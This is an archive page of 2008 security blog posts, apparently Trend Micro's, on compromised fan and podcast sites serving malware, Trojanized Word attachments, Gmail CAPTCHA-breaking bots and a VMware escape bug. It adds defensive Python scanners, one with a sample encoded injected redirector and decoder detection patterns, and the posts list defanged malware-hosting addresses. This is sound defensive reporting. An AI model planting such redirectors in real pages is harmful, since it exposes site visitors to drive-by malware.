Archive for February 28th, 2008

Arsenal Fan Site Compromised, Serves Malware

February 28th, 2008 by Jovi Umawing (Technical Communications)

Sports fan sites being compromised by malicious authors is not unheard of. We’ve seen it happen to a Jets fan site in early January this year, and we’re seeing it again on another fan site, this time one for Arsenal, a popular English soccer team.

The compromised Web site in this case is Onlinegooner.com, which was reported by ScanSafe OI to be “maliciously active.” STAT confirmed that the fan site had been injected with malicious code, which led to the download of malware from the following IP addresses:

  • 61(dot)19(dot)246(dot)58
  • 202(dot)83(dot)212(dot)250
  • 89(dot)107(dot)104(dot)30

It was observed that the aforementioned addresses were hosted in several parts of the globe, including Thailand, Hong Kong, and Russia. The downloaded malware was found to contain rootkit, keylogging, backdoor, ARP poisoning, and DNS spoofing capabilities — all of which are, admittedly, pretty sophisticated features for a piece of malware.

Onlinegooner.com has been bringing news to Arsenal fans for a decade now, and it was also news that was used to bring malware to fans. As the seeding of malware took place February 18, one motivation for the compromise could have been the then-upcoming Champions League match that the team had against AC Milan. Closely following this event was striker Eduardo da Silva’s injury, which must have also served the malicious users’ purposes in drawing more fans to the site.

Spyware from World’s Largest Podcast Directory

February 28th, 2008 by Roderick Ordoñez (Technical Communications)

A site dubbing itself as the world’s largest podcast directory has been compromised! Even Google cautions about visiting the site, warning the user that it “may harm your computer.”

The site, hxxp://www.pod-planet.com, seemingly contains a redirector string, such that a visit to the site’s main page (hxxp://www.pod-planet.com/index.asp) will automatically lead users to http://www.{BLOCKED}e8.com/app/helptop.do, which in turn downloads a malicious file from http://www.{BLOCKED}e8.com/app/wm.exe. Trend Micro detects the downloaded file as TSPY_WOWAR.AG.

Once again playing culprit in this series of redirections is injected code, which has obviously been obfuscated to deter analysis. Obfuscation — normally done to prevent direct copying of one’s own code — may actually prove detrimental to a malware (spyware) author in this case, as a chunk of illegible characters sitting in an otherwise fully legitimate site may be proof enough that something is wrong.

Diligence is required of any Webmaster, and a great deal of it is needed in this robust era of Web threats. This applies all the more to a site that calls itself the “largest podcast directory” on the Net, as malware writers are all too eager — and fully capable — to turn that “largest directory” into a platform for serving heapings of malicious intent.
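Both compromises above (the Arsenal fan site and the podcast directory) came down to code injected into otherwise legitimate pages. The following Python script is an added example, not part of the original posts or any Trend Micro tool, showing how a webmaster can scan a page for the signs described here: inline scripts that call a decoder such as unescape(), long percent-encoded blobs, and redirect targets on a host other than the site’s own. The sample HTML and the redirect host are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample page: one benign inline script plus an injected
# redirector that is percent-encoded and fed to unescape(). The redirect
# target is a placeholder host, not the domain from the original report.
SAMPLE_HTML = """<html><body><h1>Podcast Directory</h1>
<script>function show(id){document.getElementById(id).style.display='block';}</script>
<p>Latest episodes...</p>
<script>document.write(unescape('%3Cscript%3Ewindow.location%3D%22http%3A%2F%2Fexample-bad.invalid%2Fapp%2Fhelptop.do%22%3C%2Fscript%3E'))</script>
</body></html>"""

SITE_HOST = "www.pod-planet.com"   # the host the page legitimately belongs to

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
DECODER_RE = re.compile(r"\b(unescape|eval|fromCharCode|atob)\b")
PCT_RE = re.compile(r"%[0-9a-fA-F]{2}")
URL_RE = re.compile(r"https?://[\w.-]+", re.I)


def external_hosts(text, site_host):
    """Hosts of absolute URLs found in text (after percent-decoding it)
    that are not the site's own host."""
    hosts = set()
    for url in URL_RE.findall(unquote(text)):
        host = urlparse(url).hostname
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return sorted(hosts)


def find_suspicious_scripts(html, site_host, pct_threshold=10):
    """One finding per inline <script> that looks injected: it calls a
    decoder, carries a long percent-encoded blob, or (once decoded)
    points the browser at a host other than the site itself."""
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        reasons = []
        if DECODER_RE.search(body):
            reasons.append("decoder call")
        if len(PCT_RE.findall(body)) >= pct_threshold:
            reasons.append("percent-encoded blob")
        for host in external_hosts(body, site_host):
            reasons.append("external host " + host)
        if reasons:
            findings.append({"script": index, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_scripts(SAMPLE_HTML, SITE_HOST):
        print("script #%d: %s" % (f["script"], ", ".join(f["reasons"])))
```

Run it against a saved copy of each page of a site and diff the findings against a known-good baseline; a new finding on a page nobody edited is the signal that warrants a closer look.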

Trojanized Word Docs Used in Another Targeted Attack

February 28th, 2008 by Jake Soriano (Technical Communications)

A stealthier version of the Trojanized Microsoft Word documents has recently been sent as an attachment to spammed email messages. Seen as another targeted attack, these malicious Word documents seem to be riding on the popularity of the upcoming Olympics in Beijing, China. The attachments have the file name Pasadena.doc.

Trend Micro Research Project Manager Ivan Macalintal compares this recent targeted attack to others before it, and comes up with several conclusions that should worry Internet users. First, he says that detection coverage of the attack has been relatively low, even among vendors with good Office heuristics. The malicious documents, he adds, have an embedded rootkit, albeit a network-only one; the control channels are also obfuscated.

Macalintal believes that these attacks could be part of a bigger targeted malware campaign related to the Beijing Olympics. Several news articles reported protest actions after the Rose Parade in Pasadena featured a float with the China Olympics as its theme. The reasons are political and may also concern international relations with the Chinese government.

China, interestingly, was also the subject of another infamous attack using similar Trojanized Word documents last January. Besides the Olympics, that earlier targeted attack also made references to the ongoing debate regarding Tibet.

Gmail CAPTCHA Gets a Serious Kick from Bot Tagteam

February 28th, 2008 by Arman Capili (Technical Communications)

Word has it that spammers have started circumventing the CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) system used by Google’s email service, Gmail. It can be recalled that a similar issue happened with the Windows Live mail service a few weeks back.

The two attacks are pretty similar in terms of using bots to register new email accounts. However, the Gmail attack is considered more complicated since it uses two compromised hosts in its attempts to break into the Google CAPTCHA system. The first host attempts to extract a copy of the CAPTCHA image in bitmap format then attempts to break the code. In case it fails, a second host uses the same image, but breaks it down into segments then sends it as a portable image or graphic file. Segmentation is the only task where humans still outperform bots, but it is steadily gaining attention and focus among spammers and bot herders.

It is apparent in the mechanism above that Google CAPTCHAs are a lot harder to break than those from other email services—and it better be. Gmail provides a very wide window of opportunity for spammers in leveraging Google’s wide range of services for free. The popularity of Google makes it difficult to track spammers among the millions of users across the globe. This further makes Google’s domains highly unlikely to get blacklisted.

Although the success rate of breaking the Google CAPTCHA is still very low, we cannot deny that it works. We can expect more innovations in the future, and far more effective and creative ways of dealing with bots should definitely be on the to-do lists of email service providers as well.

VMWare Bug Provides Escape Hatch

February 28th, 2008 by Macky Cruz (Technical Communications)

VMWare is one of the more popular virtualization products these days. Its home page describes virtualization as a technology bound to change the IT landscape, as it allows one to “transform hardware into software.” By “virtualizing” hardware resources such as the CPU and RAM, multiple virtual machines can share those resources without interfering with one another. It has thus proven to be a handy tool for intensive security research as well as for creating and using test environments without harming the actual system.

However, Core Security Technologies has very recently reported a bug that allows malicious users to escape the virtual environment and penetrate the host system running it. The bug exists in the shared folder feature of the Windows client-based virtualization software. VMWare has, for the meantime, advised users to disable shared folders. The company has also made clear that the vulnerability is not present in its server line, and that in newer versions the user must actually turn the feature on to become susceptible to this attack.

VMWare discloses this vulnerability on this page.

Core Security Technologies has a full disclosure on this page. The vulnerability ID for this finding is CVE-2008-0923 at the National Vulnerability Database.

Trend Micro researchers are bent on giving you the freshest information on the latest threats. We are posting our findings in real-time, so please stand by for updates as we uncover more details on this particular threat.
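The workaround above is to disable shared folders. The following Python script is an added example, not part of the original post or any VMWare or Core Security tool, that audits a virtual machine’s .vmx configuration for shared folders a guest can still reach and produces a copy with them switched off. The .vmx fragment is constructed, and the key names (sharedFolderN.present, sharedFolderN.enabled, sharedFolderN.hostPath, isolation.tools.hgfs.disable) are assumed to match VMware Workstation’s settings; verify them against your own product version.

```python
import re
# Constructed sample .vmx fragment (not from the original page); the key names
# are assumed to match VMware Workstation's shared-folder settings, so verify them.
SAMPLE_VMX = '''displayName = "research-vm"
isolation.tools.hgfs.disable = "FALSE"
sharedFolder0.present = "TRUE"
sharedFolder0.enabled = "TRUE"
sharedFolder0.hostPath = "C:\\Users\\analyst\\Shared"
sharedFolder1.present = "TRUE"
sharedFolder1.enabled = "FALSE"
sharedFolder1.hostPath = "D:\\samples"
'''
LINE_RE = re.compile(r'^\s*([\w.]+)\s*=\s*"(.*)"\s*$')

def parse_vmx(text):
    """Turn key = "value" lines into a dict, skipping blank or malformed lines."""
    settings = {}
    for line in text.splitlines():
        if m := LINE_RE.match(line):
            settings[m.group(1)] = m.group(2)
    return settings

def is_true(value):
    return value.strip().upper() == "TRUE"

def active_shared_folders(settings):
    """Folders the guest can reach: HGFS not disabled, folder present and enabled
    (a missing 'enabled' key counts as enabled so the audit over-reports)."""
    if is_true(settings.get("isolation.tools.hgfs.disable", "FALSE")):
        return []
    folders = []
    for key, value in settings.items():
        m = re.match(r"^sharedFolder(\d+)\.present$", key)
        if not m or not is_true(value):
            continue
        n = m.group(1)
        if is_true(settings.get("sharedFolder%s.enabled" % n, "TRUE")):
            folders.append({"index": int(n),
                            "hostPath": settings.get("sharedFolder%s.hostPath" % n, "")})
    return sorted(folders, key=lambda f: f["index"])

def harden(settings):
    """Copy of the settings with every shared folder switched off (the advised workaround)."""
    fixed = dict(settings)
    fixed["isolation.tools.hgfs.disable"] = "TRUE"
    for key in settings:
        if re.match(r"^sharedFolder\d+\.enabled$", key):
            fixed[key] = "FALSE"
    return fixed
```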
